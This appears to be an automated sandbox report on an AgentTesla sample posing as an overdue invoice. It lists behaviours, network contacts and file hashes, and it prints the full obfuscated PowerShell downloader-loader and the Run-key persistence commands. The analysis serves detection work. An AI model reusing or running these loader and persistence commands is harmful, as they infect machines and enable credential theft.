Analysis Overview
SHA256
5bda2e2623e9c30c9571c974005206a3ebd4e66009069f0105597a9449ff7c57
Threat Level: Known bad
The file overdue_invoice.ace was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Checks computer location settings
Adds Run key to start application
Looks up external IP address via web service
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 09:18
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 09:18
Reported
2024-06-03 09:20
Platform
win10v2004-20240426-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tonsillectomic = "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\\Codebtors\\').Typeregningens;%Rundsavsbladene% ($sartor)" | C:\Windows\SysWOW64\reg.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4980 set thread context of 5016 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.innovativebuildingsolutions.in | udp |
| IN | 103.21.58.98:443 | www.innovativebuildingsolutions.in | tcp |
| US | 8.8.8.8:53 | 98.58.21.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| IN | 103.21.58.98:443 | www.innovativebuildingsolutions.in | tcp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.65.42.20.in-addr.arpa | udp |
Files
memory/4456-0-0x00007FFC72C73000-0x00007FFC72C75000-memory.dmp
memory/4456-1-0x000001CF56080000-0x000001CF560A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t4issik1.lhn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4456-11-0x00007FFC72C70000-0x00007FFC73731000-memory.dmp
memory/4456-12-0x00007FFC72C70000-0x00007FFC73731000-memory.dmp
memory/4980-15-0x0000000004DA0000-0x0000000004DD6000-memory.dmp
memory/4980-16-0x00000000054E0000-0x0000000005B08000-memory.dmp
memory/4980-17-0x00000000054A0000-0x00000000054C2000-memory.dmp
memory/4980-18-0x0000000005C80000-0x0000000005CE6000-memory.dmp
memory/4980-19-0x0000000005CF0000-0x0000000005D56000-memory.dmp
memory/4980-29-0x0000000005E80000-0x00000000061D4000-memory.dmp
memory/4980-30-0x0000000006350000-0x000000000636E000-memory.dmp
memory/4980-31-0x0000000006390000-0x00000000063DC000-memory.dmp
memory/4980-32-0x0000000007CF0000-0x000000000836A000-memory.dmp
memory/4980-33-0x00000000074A0000-0x00000000074BA000-memory.dmp
memory/4980-34-0x0000000007670000-0x0000000007706000-memory.dmp
memory/4980-35-0x00000000075C0000-0x00000000075E2000-memory.dmp
memory/4980-36-0x0000000008370000-0x0000000008914000-memory.dmp
C:\Users\Admin\AppData\Roaming\Skrmet.Kli
| MD5 | 9916e5a5f7afe8c1f861f93999a875f3 |
| SHA1 | 8d1f119fcb5942cd8e71f3bb1fc527c2a74549cc |
| SHA256 | 97cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df |
| SHA512 | 30b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc |
memory/4980-38-0x0000000008920000-0x000000000C57C000-memory.dmp
memory/4456-39-0x00007FFC72C73000-0x00007FFC72C75000-memory.dmp
memory/4456-40-0x00007FFC72C70000-0x00007FFC73731000-memory.dmp
memory/5016-46-0x0000000001200000-0x0000000001240000-memory.dmp
memory/5016-45-0x0000000001200000-0x0000000002454000-memory.dmp
memory/4456-49-0x00007FFC72C70000-0x00007FFC73731000-memory.dmp
memory/5016-50-0x0000000024850000-0x00000000248A0000-memory.dmp
memory/5016-51-0x0000000024940000-0x00000000249D2000-memory.dmp
memory/5016-52-0x0000000024930000-0x000000002493A000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 09:18
Reported
2024-06-03 09:20
Platform
win7-20240221-en
Max time kernel
141s
Max time network
147s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\tonsillectomic = "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\\Codebtors\\').Typeregningens;%Rundsavsbladene% ($sartor)" | C:\Windows\SysWOW64\reg.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1964 set thread context of 2112 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
